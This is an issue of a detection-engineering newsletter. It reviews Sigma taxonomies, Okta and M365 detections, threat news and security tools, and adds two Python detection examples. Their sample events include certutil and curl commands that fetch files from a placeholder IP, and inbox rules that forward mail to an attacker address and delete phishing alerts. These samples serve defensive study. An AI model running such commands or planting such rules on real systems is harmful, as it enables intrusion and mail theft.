Det. Eng. Weekly #48 - I have an idea for a new threat taxonomy
No bro I promise it'll be the last one we'll ever need I promise bro
Welcome to Issue #48 of Detection Engineering Weekly!
10 hours of work so you can have a 10 minute read. Get DEW every Wednesday morning/afternoon. Subscribe now!
This week’s recap:
💎 by Thomas Patzke of the SigmaHQ team on taxonomies
Jared Atkinson’s Part 11 of “On Detection” series, MITRE Engenuity’s LLM TTP extractor, Censys pivoting with Michael Koczwara, Chandler Matthews and Brandon Dossantos from Expel with some detection opportunities in Okta and M365
Some great podcasts on SaaS threat detection and the disastrous CVE ecosystem
Scattered Spider, FCC battles SIM Swappers, CrushFTP crushing it like Sam Altman, and doorbells DDoSing
⏪ Did you miss the previous issues? I'm sure you wouldn't, but JUST in case:
🌐 Newsletter Network:
I want to start highlighting other newsletters in each issue that I find helpful and want to show others. These newsletters may be big or small, professional or personal, security-related or not.
Jake is a fellow newsletter creator, and his OSINT Newsletter is unique. Not only does it combine OSINT tools and news, but it also has all kinds of interactive gems in there, such as geolocation challenges with prizes. Please consider reading his newsletter and subscribing!
💎 Detection Engineering Gem 💎
Beyond One-Size-Fits-All: Sigma’s Approach to Taxonomies by Thomas Patzke
Have you ever had to design a log pipeline with a strategy for field names and how those fields map to each other, a.k.a. a taxonomy? How about deconflicting field names across several log sources, merging fields, or, even worse, trying to keep BOTH values of a colliding field stored somewhere non-confusing so neither gets clobbered? Shudders in GROK.
I love how open the Sigma project is with its decision-making, and Patzke wastes no time showing how hard it is to implement field standards for an open-source security project. When you maintain a format thousands of practitioners use, you opt for flexibility: it lets you deconflict fields quickly, add new ones, and avoid inflicting pain on others who want to implement your tool differently.
If you are designing something like this for your internal detection program, compare implementing an open standard against rolling your own: for an internal program, rolling your own is the better option.
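To make the field-mapping problem concrete, here is an added toy example (mine, not code from the Sigma project or from Patzke's post). Two constructed event shapes, a Sysmon-style process event and a generic EDR-style one, are mapped onto a single canonical taxonomy (the Sigma process_creation field names), every original field is preserved under a namespaced `raw.<source>` key so nothing is clobbered, and one Sigma-like selection is evaluated against the canonical view. The source field names for the "edr" shape, the mappings, and the events are all assumptions; a real pipeline would use pySigma's processing pipelines instead of this hand-rolled mapper.

```python
"""Toy field-taxonomy normalizer plus a Sigma-style selection matcher.

Added illustration, not Sigma project code. Field names in the "edr" shape,
the mapping tables and the sample events below are all constructed.
"""
from typing import Any, Dict, Iterable, List, Tuple

# Per-source mapping: source field name -> canonical (Sigma taxonomy) field.
FIELD_MAPS: Dict[str, Dict[str, str]] = {
    "sysmon": {
        "Image": "Image",
        "CommandLine": "CommandLine",
        "ParentImage": "ParentImage",
        "User": "User",
    },
    "edr": {  # assumed dotted names for a generic EDR product
        "process.executable": "Image",
        "process.command_line": "CommandLine",
        "process.parent.executable": "ParentImage",
        "user.name": "User",
    },
}


def normalize(source: str, event: Dict[str, Any]) -> Dict[str, Any]:
    """Map one event onto the canonical taxonomy.

    Canonical fields go to the top level; the full original event is kept
    verbatim under raw.<source>, so two sources that both carry a "User"
    field with different semantics never overwrite each other. If two source
    fields map to the same canonical field with different values, the
    conflict is recorded instead of silently clobbering the first value.
    """
    fmap = FIELD_MAPS[source]
    out: Dict[str, Any] = {"source": source, "raw": {source: dict(event)}}
    for src_field, value in event.items():
        canon = fmap.get(src_field)
        if canon is None:
            continue  # unmapped fields survive only under raw.<source>
        if canon in out and out[canon] != value:
            out.setdefault("conflicts", []).append((canon, out[canon], value))
            continue
        out[canon] = value
    return out


def _match_value(actual: Any, expected: Any, modifier: str) -> bool:
    """Sigma-style comparison: case-insensitive, with contains/startswith/endswith."""
    if actual is None:
        return False
    a, e = str(actual).lower(), str(expected).lower()
    if modifier == "contains":
        return e in a
    if modifier == "endswith":
        return a.endswith(e)
    if modifier == "startswith":
        return a.startswith(e)
    return a == e


def matches(selection: Dict[str, Any], event: Dict[str, Any]) -> bool:
    """Evaluate a selection written as {"Field|modifier": value-or-list}.

    Every key must match (AND); a list of values matches if any one does (OR),
    mirroring how a Sigma selection map is read.
    """
    for key, expected in selection.items():
        field, _, modifier = key.partition("|")
        candidates = expected if isinstance(expected, list) else [expected]
        if not any(_match_value(event.get(field), c, modifier) for c in candidates):
            return False
    return True


# Constructed sample events: (source, raw event).
SAMPLE_EVENTS: List[Tuple[str, Dict[str, Any]]] = [
    ("sysmon", {"Image": "C:\\Windows\\System32\\certutil.exe",
                "CommandLine": "certutil.exe -urlcache -split -f http://198.51.100.7/a.txt",
                "ParentImage": "C:\\Windows\\System32\\cmd.exe",
                "User": "CORP\\alice"}),
    ("edr", {"process.executable": "/usr/bin/curl",
             "process.command_line": "curl -s http://198.51.100.7/a.txt",
             "process.parent.executable": "/bin/bash",
             "user.name": "bob"}),
    ("edr", {"process.executable": "C:\\Windows\\System32\\certutil.exe",
             "process.command_line": "certutil.exe -urlcache -f http://example.com/x",
             "process.parent.executable": "C:\\Windows\\explorer.exe",
             "user.name": "carol"}),
]

# The detection is written once, against canonical field names only.
CERTUTIL_DOWNLOAD = {
    "Image|endswith": "\\certutil.exe",
    "CommandLine|contains": ["-urlcache", "-verifyctl"],
}


def run(events: Iterable[Tuple[str, Dict[str, Any]]] = SAMPLE_EVENTS,
        selection: Dict[str, Any] = CERTUTIL_DOWNLOAD) -> List[str]:
    """Return the canonical User of every event that matches the selection."""
    normalized = (normalize(src, ev) for src, ev in events)
    return [n["User"] for n in normalized if matches(selection, n)]


if __name__ == "__main__":
    print(run())
```

The point of the `raw` namespace is the "keep BOTH values" problem from the paragraph above: the canonical view is what rules match against, but an analyst can still see exactly what each source said, and a collision between two source fields is surfaced as a `conflicts` entry rather than lost.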
🔬 State of the Art
On Detection: Tactical to Functional Part 11: Functional Composition by Jared Atkinson
Jared's Part 11 of his "On Detection" series digs into function chains. In previous posts, you could follow a specific technique's function chain by first listing the necessary steps in PowerShell (or another Windows-heavy language) and following the API documentation down to the system call. That surfaced all kinds of interesting detection opportunities, but what do you do when it is time to write the detections? Jared takes some of these techniques, shows the API functions involved, and shows how they interconnect along the chain. It's a simple but brilliant way to decompose a technique into its components.
The MITRE Engenuity folks partnered with industry to automate TTP extraction in their TRAM project via Large Language Models. The researchers annotated 150 threat reports, producing thousands of technique labels, to train the model. Think of it as an open-source take on the custom GPTs OpenAI recently launched.
Threat Intel-Pivoting using Censys by Michael Koczwara
If you are a researcher, threat hunter, or cyber-curious, you should sign up for a free version of Censys. With information from threat intel reports, Koczwara used the tool to map out net-new infrastructure likely attributed to MuddyWater (Iran-aligned APT). This can bolster your threat detection capabilities if you can accurately fingerprint infrastructure and load it as an enrichment for downstream detections.
Starting with just an IP and port combination, you can go a long way, from filtering out false positives (such as the legitimate RMM software featured in this post) to pivoting onto other infrastructure. Threat actors are like us: they build and deploy things in a repeatable fashion!
Okta cross-tenant impersonation: a new Expel detection by Chandler Matthews
If you followed the MGM hack timeline, one of the notable findings was a novel persistence mechanism ALPHV used to stay inside MGM's network, specifically around their identity provider, Okta. Matthews talks about how hard it is to reverse-engineer an incident timeline to find novel detection opportunities, and this case was no exception. They walk through the persistence scenario and outline several opportunities to alert on the technique with enough fidelity to be worthwhile, but not so narrowly that a small variation slips past.
Suspicious Outlook rules: high-fidelity patterns to watch for by Brandon Dossantos
Expel is coming in hot with detection blog posts this month! A friend of the newsletter, Brandon, gives a detailed breakdown of how to build detections for M365 Outlook. Many threat actors, such as BEC-focused groups, abuse Outlook's mailbox rules to conceal, redirect, and exfiltrate mail from a mailbox. The wild part is that the Expel team has triaged actual incidents with BEC-aligned objectives where the actor tried to evade security detections by creating rules that delete messages related to phishing and other anomalous activity.
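As an added example of the kind of pattern the post describes (this is my own illustration, not Expel's detection logic or code from their post), here is a small scorer that triages inbox-rule audit events. The record shape (an `Operation` of `New-InboxRule`/`Set-InboxRule` with `Parameters` as Name/Value pairs and `;`-separated multi-values) follows the Exchange entries in the M365 unified audit log as I understand them; the sample records, the keyword list, the hiding-folder list, the weights and the threshold are all constructed assumptions that you would tune against your own tenant.

```python
"""Heuristic scoring of suspicious M365 inbox rules.

Added illustration, not Expel's logic. Record layout mirrors Exchange
operations in the unified audit log (assumed); records, keyword lists,
weights and the alert threshold are constructed for the example.
"""
import json
from typing import Any, Dict, List, Tuple

ORG_DOMAINS = {"example.com"}  # assumed: the tenant's own mail domains

# Folders attackers use to bury mail the victim rarely opens.
HIDING_FOLDERS = {"rss feeds", "rss subscriptions", "deleted items", "junk email",
                  "archive", "conversation history", "notes"}
# Substrings that single out security or payment traffic rather than real filing needs.
TARGET_WORDS = {"phish", "hack", "password", "suspicious", "security",
                "invoice", "payment", "wire", "fraud", "compromise"}
RULE_OPS = {"New-InboxRule", "Set-InboxRule"}
KEYWORD_PARAMS = ("SubjectContainsWords", "BodyContainsWords",
                  "SubjectOrBodyContainsWords", "FromAddressContainsWords")
FORWARD_PARAMS = ("ForwardTo", "RedirectTo", "ForwardAsAttachmentTo")


def _params(record: Dict[str, Any]) -> Dict[str, str]:
    """Flatten the audit log's [{"Name": ..., "Value": ...}] list into a dict."""
    return {p["Name"]: str(p.get("Value", "")) for p in record.get("Parameters", [])}


def _is_external(addr: str) -> bool:
    return "@" in addr and addr.rsplit("@", 1)[-1].lower() not in ORG_DOMAINS


def score_rule(record: Dict[str, Any]) -> Tuple[int, List[str]]:
    """Return (score, reasons) for one audit record; (0, []) for non-rule operations."""
    if record.get("Operation") not in RULE_OPS:
        return 0, []
    p = _params(record)
    score, reasons = 0, []
    if p.get("DeleteMessage", "").lower() == "true":
        score += 3; reasons.append("deletes matching mail")
    if p.get("MoveToFolder", "").lower() in HIDING_FOLDERS:
        score += 3; reasons.append(f"moves mail to {p['MoveToFolder']!r}")
    for fwd in FORWARD_PARAMS:
        targets = [t.strip() for t in p.get(fwd, "").split(";") if t.strip()]
        external = [t for t in targets if _is_external(t)]
        if external:
            score += 4; reasons.append(f"{fwd} to external {', '.join(external)}")
    words = " ".join(p.get(k, "") for k in KEYWORD_PARAMS).lower()
    hits = sorted(w for w in TARGET_WORDS if w in words)
    if hits:
        score += 2; reasons.append(f"targets keywords {hits}")
    if p.get("MarkAsRead", "").lower() == "true":
        score += 1; reasons.append("marks mail as read")
    name = p.get("Name", "").strip()
    if len(name) <= 2:
        score += 1; reasons.append(f"rule name {name!r} is empty or trivial")
    return score, reasons


def triage(records: List[Dict[str, Any]], threshold: int = 5) -> List[Dict[str, Any]]:
    """Return one alert per record whose score reaches the (assumed) threshold."""
    alerts = []
    for r in records:
        s, why = score_rule(r)
        if s >= threshold:
            alerts.append({"user": r.get("UserId"), "rule": _params(r).get("Name"),
                           "score": s, "reasons": why})
    return alerts


# Constructed sample records in the shape of AuditData JSON blobs.
SAMPLE_RECORDS = [json.loads(s) for s in [
    '{"CreationTime":"2023-11-20T14:02:11","Operation":"New-InboxRule","UserId":"alice@example.com",'
    '"Parameters":[{"Name":"Name","Value":"."},{"Name":"SubjectOrBodyContainsWords","Value":"phishing;hacked;password"},'
    '{"Name":"DeleteMessage","Value":"True"},{"Name":"MarkAsRead","Value":"True"}]}',
    '{"CreationTime":"2023-11-20T15:30:00","Operation":"New-InboxRule","UserId":"bob@example.com",'
    '"Parameters":[{"Name":"Name","Value":"Vendor invoices"},{"Name":"SubjectContainsWords","Value":"Invoice"},'
    '{"Name":"MoveToFolder","Value":"Invoices"}]}',
    '{"CreationTime":"2023-11-21T03:11:45","Operation":"Set-InboxRule","UserId":"carol@example.com",'
    '"Parameters":[{"Name":"Name","Value":".."},{"Name":"ForwardTo","Value":"attacker@mail.test"},'
    '{"Name":"MoveToFolder","Value":"RSS Feeds"},{"Name":"SubjectContainsWords","Value":"wire;payment"}]}',
    '{"CreationTime":"2023-11-21T08:00:00","Operation":"UserLoggedIn","UserId":"dave@example.com","Parameters":[]}',
]]

if __name__ == "__main__":
    for alert in triage(SAMPLE_RECORDS):
        print(json.dumps(alert))
```

Bob's legitimate "Vendor invoices" rule scores on the keyword alone and stays under the threshold, while Alice's one-character rule that deletes and marks-as-read anything mentioning phishing or passwords, and Carol's rule that forwards wire/payment mail externally and buries it in RSS Feeds, both alert. Stacking independent signals (destructive action, external forward, security keywords, throwaway name) is what keeps the fidelity high without hard-coding one actor's exact rule.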
🎙️ Detection Engineering Podcasts
Happy to see the DCP podcast return; this episode focuses on the SaaS threat matrix developed by Push Security (featured in Issue #34). It's cool to see the hosts compare and contrast this matrix with traditional endpoint detection.
Speaking of SaaS threats, this Soap Box episode from Risky Biz is a great follow-up to the DCP episode listed above. TL;DR: e-mail isn't incidental to a breach anymore; it is the breach vector.
I non-ironically want to write that Lorenc is dropping truth-bombs about the CVE ecosystem in this episode. His company, Chainguard, is trying to solve the CVE problem by combining tooling with human expertise. One of their products sounds like Golden-Image-as-a-Service, and it's a brilliant way to tackle the CVE problem for containers.
☣️ Threat Landscape
Scattered Spider by CISA
I guess it's a badge of honor to be mentioned by CISA. Still, it's nice to see the government organization give a technical breakdown of this year's most notorious threat actor group. It takes a lot of work to collate data from several sources into an ATT&CK map that reflects their TTPs, and the gaps show: the only mention of AWS in this advisory is the group activating Systems Manager to do recon, whereas other reports have them using several AWS services.
The FCC has no web page for its announcements, only PDFs, TXT files, and Word documents, but I linked the PDF here. Actors like Scattered Spider and members of "the Com" actively abuse SIM swapping to target, harass, or infiltrate victim organizations, and even to take over crypto accounts.
CrushFTP Critical Vulnerability CVE-2023-43177 Unauthenticated Remote Code Execution by Ryan Emmons and Evan Malamais
The jury is still out on how widely this is being exploited. But, according to the blog authors, "10,000 public instances and many more behind corporate firewalls" are vulnerable to CVE-2023-43177. There are some fantastic technical details on the exploit here, so check it out if you want to see some Java exploitation goodness.
When doorbells go rogue! by Alex Grosjean
Let's say you run a massive open-source and paid threat intel list, and firms big and small around the world load your list into their edge devices for blocking and alerting. What would you do if you got legitimate reports of massive abuse from IPs that belong not to VPS providers or bulletproof hosters, but to residential connections and small legitimate IP spaces? Read this quote, then go read the blog:
“Alex!! I found it, I found the source of the spam! It was MY DOORBELL!”
CVE-2023-4911 was published by Qualys in early October, and six weeks later CISA added it to its Known Exploited Vulnerabilities (KEV) catalog. If you haven't checked out the Qualys writeup, it's a great read: a local privilege escalation via a buffer overflow in glibc's dynamic loader while it parses the GLIBC_TUNABLES environment variable, something you don't see a lot among the previous years of Linux priv-esc vulnerabilities.
🔗 Open Source
tram by center-for-threat-informed-defense
Interesting web app by MITRE Engenuity that automatically parses CTI reports and extracts up to 50 MITRE ATT&CK techniques. The tool also supports manual labeling of additional TTPs, with instructions to retrain the model. Linked above in the "State of the Art" section.
OktaPostExToolkit by xpn
I posted the Okta for Red Teamers blog from TrustedSec several issues ago but forgot to link the corresponding toolkit. Great post-exploitation tool for Okta: by adding an AD agent, you can intercept all kinds of authentication requests.
SigmAIQ by AttackIQ
“SigmAIQ is a wrapper for pySigma and pySigma backends & pipelines.” TL;DR: you can pip install this library, point it at a rule and a backend, and it takes care of the conversion for you. It also has an interesting LLM module you can use to ask an LLM of your choice to search for or create new rules.
awesome-threat-intel-blogs by signalscorps
Yet another awesome-* list, this one of intel blogs. All kinds of stuff in here for primary and secondary research, from DFIR blogs at major vendors to news organizations and individual analysts. The author has a handy spreadsheet of the sources at the end of the README.
BestEdrOfTheMarket by Xacone
A “naive” open-source EDR to help security researchers understand common EDR detection mechanisms and develop bypasses. This will be my next lab project over the holidays!